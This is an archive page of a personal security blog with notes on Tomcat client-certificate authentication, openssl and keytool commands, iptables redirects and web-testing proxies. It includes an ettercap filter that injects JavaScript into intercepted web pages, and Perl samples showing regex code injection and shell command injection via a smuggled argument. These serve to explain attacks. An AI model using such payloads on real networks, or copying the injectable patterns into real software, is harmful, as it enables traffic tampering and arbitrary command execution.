Archive for the 'Security' Category

Injecting JavaScript with ettercap

Monday, August 15th, 2005

This should inject a JavaScript snippet that reads the client's local IP address:

replace("^</BODY>","<script>s1 = \"error\";s2 = \"error\";try { so = new java.net.Socket(); so.bind(new java.net.InetSocketAddress(\"0.0.0.0\",0)); so.connect(new java.net.InetSocketAddress(document.domain,80)); s1 = so.getLocalAddress().getHostAddress(); s2 = so.getLocalAddress().getHostName(); so.close(); } catch (e) { document.writeln(e); } alert(\"Client's IP: \"+ s1 + \"(\"+s2+\")\"); </script></BODY>");

You need to compile this filter with etterfilter and run it with "ettercap -F <filter.ef>".

I haven't tried it, but it should work.

VLAN tagging

Tuesday, June 7th, 2005

802.1Q VLAN: tagging for packet exchange between switches (the switch port needs to be reconfigured). It can be done with a hypervisor to attach VLANs to virtual domains.

Linux: I don't know the easiest way to do it in iptables. There seems to be another L2 filtering tool: http://ebtables.sourceforge.net/

Tomcat4 – client authentication findings

Thursday, November 25th, 2004
  1. MemoryRealm works fine.
  2. UserDatabase doesn't work. The code is OK, but apparently while parsing the server.xml file and creating the UserDatabase declared there, the server creates some kind of property file (MBeans), which of course cannot be created for a property containing the '=' sign. Therefore it fails.
  3. Other realms could possibly work, but they don't implement the authenticate(cert[]) function, which is called to verify the certificates. It's a bit of a shame and I really don't see why it could not work.

Tomcat4 – client authentication

Wednesday, November 24th, 2004

Setting up a connector in /var/lib/tomcat4/conf/server.xml:

<Connector className="org.apache.catalina.connector.http.HttpConnector"
           port="8443" minProcessors="5" maxProcessors="75"
           enableLookups="true" acceptCount="10" debug="0"
           scheme="https" secure="true">
  <Factory className="org.apache.catalina.net.SSLServerSocketFactory"
           clientAuth="true" protocol="TLS"
           keystoreFile="/home/pie/bla/keystore" keystorePass="changeit"/>
</Connector>

Setting up trusted certificates (other than the cacerts file somewhere in the Java installation):

export CATALINA_OPTS="-Djavax.net.ssl.trustStore=/home/pie/bla/ca -Djavax.net.ssl.trustStorePassword=changeit -Djavax.net.debug=ssl"

BTW: Tomcat5 allows specifying trusted certs directly in server.xml.

The last option (-Djavax.net.debug=ssl) produces very usable debug information in the log file. It's useful together with s_client for debugging this setup.

OpenSSL – useful commands

Wednesday, November 24th, 2004

Just a few things I learnt playing with openssl:

Generating a root CA certificate. It's also a self-signed certificate, so if that is all you want, you can stop here:

openssl req -new -x509 -keyout <keyPem> -out <certPem> -days 365 -extensions v3_ca

Generating a key and a certificate request:

openssl req -new -nodes -keyout <keyPem> -out <csrfile>

Signing a certificate request:

openssl x509 -req -days 356 -in <csrfile> -out <certfile> -CA ca3cert.pem -CAkey ca3key.pem -set_serial <serial>

Re-signing an existing certificate (without -req the input is a certificate, not a request):

openssl x509 -days 356 -in <cert> -out <certfile> -CA ca3cert.pem -CAkey ca3key.pem -set_serial <serial>

Now with keytool:

keytool -genkey -keystore <keystore> -dname "<dname string, see the man page>"

Then we can export certificate signing request:

keytool -certreq -alias mykey -file <csrFile> -keystore <keystore>

Finally import the certificate:

keytool -import -keystore <keystore> -file <certPem>

Exporting certificates for Mozilla/IE:

cat <keyPem> <certPem> > tmp
openssl pkcs12 -export -in tmp -out <file.p12> -certfile <cacert.pem>

Viewing certificate:

openssl x509 -in <cert> -text | less

Testing if it works:

openssl s_client -connect localhost:8443 -cert user2cert.pem -key user2key.pem -CAfile ca3cert-1.pem
openssl s_server -accept 8443 -cert serverCert.pem -key serverKey.pem -CAfile ca3cert-1.pem

Just a few notes:

  1. Tomcat uses the alias mykey for the key it uses for the website.
  2. To import certificates into Mozilla/IE you also need to include the CA certificate in the PKCS#12 file.
  3. There is a script, CA.pl, which seems to automate many of these tasks.
  4. Watch out for V3 extensions (certificate purpose, CA:TRUE/FALSE, etc.).
  5. Most of these options can be specified directly in the openssl.cnf configuration file.
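To exercise the notes above in one go, here is an added example (not from the original post): it builds a throwaway CA and client certificate with the same openssl commands, then verifies the chain, the certificate purpose (note 4) and that the PKCS#12 bundle carries the CA cert (note 2), keeping the extensions in a private config file instead of the system openssl.cnf (note 5). Names such as Demo Root CA, user2 and the password changeit are assumed sample values.

```shell
#!/bin/sh
# Added example, not from the original post: a throwaway PKI built with the openssl
# commands above, then checked for the things the notes warn about (V3 extensions,
# certificate purpose, CA cert inside the PKCS#12). Assumes openssl >= 1.1.1; names
# such as "Demo Root CA", "user2" and the password "changeit" are made-up samples.
set -eu
make_pki() (                       # $1 = empty work dir; runs in a subshell
  cd "$1"
  # Note 5: extensions are kept in our own config instead of the system openssl.cnf
  cat > ca.cnf <<'EOF'
[req]
distinguished_name = dn
[dn]
[v3_ca]
basicConstraints = critical,CA:TRUE
keyUsage = critical,keyCertSign,cRLSign
[usr_cert]
basicConstraints = CA:FALSE
keyUsage = digitalSignature
extendedKeyUsage = clientAuth
EOF
  # Self-signed root CA (the "-extensions v3_ca" step of the post)
  openssl req -new -x509 -nodes -newkey rsa:2048 -days 365 -config ca.cnf \
    -extensions v3_ca -subj "/CN=Demo Root CA" -keyout cakey.pem -out cacert.pem
  # Client key + CSR, then sign the CSR as an end-entity client certificate
  openssl req -new -nodes -newkey rsa:2048 -config ca.cnf -subj "/CN=user2" \
    -keyout user2key.pem -out user2.csr
  openssl x509 -req -days 365 -in user2.csr -CA cacert.pem -CAkey cakey.pem \
    -set_serial 1 -extfile ca.cnf -extensions usr_cert -out user2cert.pem
  # Note 2: the browser bundle must carry the CA certificate as well
  openssl pkcs12 -export -inkey user2key.pem -in user2cert.pem \
    -certfile cacert.pem -passout pass:changeit -out user2.p12
) >/dev/null 2>&1
# Does user2's cert chain to the CA and is it allowed for the given purpose?
verify_purpose() {                 # $1 = work dir, $2 = sslclient | sslserver
  openssl verify -CAfile "$1/cacert.pem" -purpose "$2" "$1/user2cert.pem" >/dev/null 2>&1
}
# Number of certificates inside the PKCS#12 bundle (expect 2: user2 + CA)
p12_cert_count() {
  openssl pkcs12 -in "$1/user2.p12" -passin pass:changeit -nokeys 2>/dev/null \
    | grep -c 'BEGIN CERTIFICATE'
}
if [ "${1:-}" = "demo" ]; then     # usage: sh pki.sh demo
  d=$(mktemp -d); make_pki "$d"
  verify_purpose "$d" sslclient && echo "client auth: ok"
  verify_purpose "$d" sslserver || echo "server auth: rejected (EKU is clientAuth only)"
  echo "certificates in p12: $(p12_cert_count "$d")"
fi
```

The sslserver check is expected to fail: the client certificate carries only the clientAuth extended key usage, which is exactly the purpose mismatch note 4 warns about.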

Pointers from “Innocent Code”

Wednesday, November 10th, 2004

Just a few interesting pointers to tools from a book I read:

  • WHArsenal – www.whitesec.com (doesn’t seem to be available anymore)
  • HTTPush – on the fly modification of requests (in Perl)
  • WEBScarab – http://www.owasp.org/software/webscarab.html
  • Spikeproxy – http://packages.debian.org/unstable/net/spikeproxy.html
  • PenProxy – http://shh.thathost.com/pub-java/html/PenProxy.html

Perl injection

Thursday, October 28th, 2004

#!/usr/bin/perl -w
# Regex code injection: a (?{ ... }) block inside a pattern runs arbitrary Perl code.

use re 'eval';   # this evil command enables it!

$a = "bla";
# User-supplied text interpolated straight into the pattern
$user_input = q{(?{ print "we're executing this code ;-)\n"; })};
$a =~ /$user_input/;

#!/usr/bin/perl -w
# Shell command injection: the argument is interpolated into a backtick command,
# so an argument such as "foo; id" makes the shell run a second command.

@files = `ls $ARGV[0]`;
print "file list: @files\n";

Bind forwarding

Monday, October 25th, 2004

One of the problems with DNS cat is that the server may already be running a DNS server. Multiple servers cannot share a single port 53.

The workaround is "DNS forwarding".

IPtables tricks

Tuesday, October 19th, 2004

  • Redirecting incoming packets to another port:

    iptables -t nat -I PREROUTING -p tcp --destination-port <other port> -j REDIRECT --to-ports 25

  • All packets that would go out through the Internet-connected interface will be masqueraded:

    iptables -t nat -I POSTROUTING -o <interface> -j MASQUERADE

I recently found out that this redirect doesn't work for traffic generated to the local interface. Following the advice from this list (http://lists.netfilter.org/pipermail/netfilter/2004-March/051478.html) I got it to work (I don't know if you need some special kernel options as they suggested; it just worked for me on 2.6.x).

iptables -t nat -I OUTPUT -p tcp --destination-port <other port> -o lo -d localhost -j REDIRECT --to-ports 25